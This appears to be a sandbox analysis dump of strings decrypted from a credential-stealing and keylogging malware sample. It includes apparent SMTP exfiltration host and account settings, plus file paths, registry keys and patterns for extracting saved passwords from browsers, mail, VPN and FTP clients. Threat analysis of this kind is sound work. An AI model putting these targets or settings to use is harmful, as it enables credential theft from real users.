Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Time:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>User Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>Computer Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>OSFullName:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>CPU:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>RAM:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: New
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: mail.solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Qdk,[nKrmI0j
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Type
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \drivers\etc\hosts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <b>[
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ]</b> (
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: )<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {BACK}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ALT+TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ALT+F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ESC}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {Win}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {CAPSLOCK}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYUP}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYDOWN}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYLEFT}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {KEYRIGHT}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {DEL}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {END}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {HOME}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {Insert}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {NumLock}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {PageDown}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {PageUp}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {ENTER}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F1}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F2}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F3}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F5}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F6}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F7}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F8}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F9}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F10}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F11}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {F12}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: control
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {CTRL}
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: &
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: >
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: logins
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Secure Note
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Web Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Credential Picker Protector
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Web Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Domain Certificate Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Domain Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Extended Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UC Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UCBrowser\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Login Data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: journal
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: wow_logins
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Safari for Windows
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <array>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <dict>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <data>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </data>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: -convert xml1 -s -o "
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \fixed_keychain.xml"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Microsoft\Protect\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: credential
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: QQ Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Default\EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Profile
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: entries
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: category
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: str3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: str2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: blob0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password_value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IncrediMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts_New
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmtpServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: EmailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Eudora
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: current
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SavePasswordText
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ReturnAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Falkon Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \falkon\profiles\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \browsedata.db
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: autofill
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ClawsMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Claws-mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passkey0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accountrc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: smtp_server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: address
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \passwordstorerc
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: {(.),(.)}(.*)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Flock Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Flock\Browser\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: signons3.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: DynDns
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: https://account.dyn.com/
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: t6KzXhCh
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: global
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: name
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Psi\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Psi+\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: OpenVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: auth-data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: entropy
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: USERPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \OpenVPN\config\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVpn.exe*
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: user.config
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: //setting[@name='Username']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: //setting[@name='Password']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: %ProgramW6432%
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \account.json
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ."username":"(.?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ."password":"(.?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: privateinternetaccess.com
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FileZilla
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Server>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: CoreFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Port
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: hdfzpysvpzimorhk
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HostName
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UserName
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PublicKeyFile
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PortNumber
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ABCDEF
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Flash FXP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: port
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: user
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: quick.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Sites.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTP Navigator
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: No Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmartFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WS_FTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HOST
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FtpCommander
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \cftp\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Server=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Anonymous=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FTPGetter\servers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: DataDir
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Folder.lst
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Mailbox.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PassWd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Outlook
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
